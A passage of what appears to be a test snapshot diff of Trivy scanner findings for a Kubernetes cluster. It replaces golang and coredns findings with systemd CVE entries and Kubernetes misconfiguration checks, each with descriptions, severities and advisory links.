"https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5226-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3997", + "https://www.openwall.com/lists/oss-security/2022/01/10/2", ], }, "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "A flaw was found in systemd. An uncontrolled recursion in systemd-tmpfiles may lead to a denial of service at boot time when too many nested directories are created in /tmp.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "name": "systemd: Uncontrolled recursion in systemd-tmpfiles when removing files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", + "value": "https://avd.aquasec.com/nvd/cve-2021-3997", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "value": "https://access.redhat.com/security/cve/CVE-2021-3997", }, { "type": "URL", - "value": "https://go.dev/cl/340830", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024639", }, { "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3997", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://github.com/systemd/systemd/commit/5b1cf7a9be37e20133c0208005274ce4a5b5c6a1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3997", }, { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://ubuntu.com/security/notices/USN-5226-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3997", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://www.openwall.com/lists/oss-security/2022/01/10/2", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.3", - "packageName": "golang.org/x/text", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202305-15", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5928-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.20.0-alpha.2", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8565", - "installedVersion": "v0.19.2", - "packageName": "k8s.io/client-go", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8565", - "https://github.com/advisories/GHSA-8cfg-vx93-jvxw", - "https://github.com/kubernetes/kubernetes/commit/e99df0e5a75eb6e86123b56d53e9b7ca0fd00419", - "https://github.com/kubernetes/kubernetes/issues/95623", - "https://github.com/kubernetes/kubernetes/pull/95316", - "https://groups.google.com/g/kubernetes-announce/c/ScdmyORnPDk", - "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8565", - "https://pkg.go.dev/vuln/GO-2021-0064", - "https://www.cve.org/CVERecord?id=CVE-2020-8565", + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", ], }, "category": "Vulnerability", - "description": "In Kubernetes, if the logging level is set to at least 9, authorization and bearer tokens will be written to log files. This can occur both in API server logs and client tool output like kubectl. This affects <= v1.19.3, <= v1.18.10, <= v1.17.13, < v1.20.0-alpha2.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "kubernetes: Incomplete fix for CVE-2019-11250 allows for token leak in logs when logLevel >= 9", + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8565", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8565", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8cfg-vx93-jvxw", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/commit/e99df0e5a75eb6e86123b56d53e9b7ca0fd00419", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/issues/95623", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://github.com/kubernetes/kubernetes/pull/95316", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://groups.google.com/g/kubernetes-announce/c/ScdmyORnPDk", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8565", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0064", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8565", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'coredns' of Deployment 'coredns' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV022", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv022", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, - "category": "Misconfiguration", - "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", - "name": "Non-default capabilities added(Container 'coredns' of Deployment 'coredns' should not set 'securityContext.capabilities.add')", + "category": "Vulnerability", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv022", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3134-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u8", - "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3161-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u10", - "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3366-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb10u11", - "foundIn": "Target: 'k8s.gcr.io/kube-apiserver:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3412-1", - "installedVersion": "2021a-0+deb10u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0001", - ], - }, - "category": "Misconfiguration", - "description": "Disable anonymous requests to the API server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Set '--anonymous-auth' to 'false'.", - "name": "Ensure that the --anonymous-auth argument is set to false(Ensure that the --anonymous-auth argument is set to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0001", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0006", - "installedVersion": undefined, - "packageName": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20386", + "installedVersion": "241-7~deb10u7", + "packageName": "libsystemd0", "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0006", + "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", + "https://access.redhat.com/security/cve/CVE-2019-20386", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", + "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", + "https://linux.oracle.com/cve/CVE-2019-20386.html", + "https://linux.oracle.com/errata/ELSA-2020-4553.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + "https://security.netapp.com/advisory/ntap-20200210-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-20386", ], }, - "category": "Misconfiguration", - "description": "Verify kubelet's certificate before establishing connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Follow the Kubernetes documentation and setup the TLS connection between the apiserver and kubelets. ", - "name": "Ensure that the --kubelet-certificate-authority argument is set as appropriate(Ensure that the --kubelet-certificate-authority argument is set as appropriate)", + "category": "Vulnerability", + "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0006", - }, - { - "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://avd.aquasec.com/nvd/cve-2019-20386", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0010", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0010", - ], - }, - "category": "Misconfiguration", - "description": "Limit the rate at which the API server accepts requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Follow the Kubernetes documentation and set the desired limits in a configuration file. Then, edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml and set the below parameters.", - "name": "Ensure that the admission control plugin EventRateLimit is set(Ensure that the admission control plugin EventRateLimit is set)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/kcv0010", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://access.redhat.com/security/cve/CVE-2019-20386", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV0012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/ksv0012", - ], - }, - "category": "Misconfiguration", - "description": "Always pull images.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --enable-admission-plugins parameter to include AlwaysPullImages.", - "name": "Ensure that the admission control plugin AlwaysPullImages is set(Ensure that the admission control plugin AlwaysPullImages is set)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv0012", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", }, { "type": "URL", - "value": "https://www.cisecurity.org/benchmark/kubernetes", + "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KCV0013", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://www.cisecurity.org/benchmark/kubernetes", - "https://avd.aquasec.com/misconfig/kcv0013", - ], - }, - "category": "Misconfiguration", - "description": "The SecurityContextDeny admission controller can be used to deny pods which make use of some SecurityContext fields which could allow for privilege escalation in the cluster. This should be used where PodSecurityPolicy is not in place within the cluster.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", - 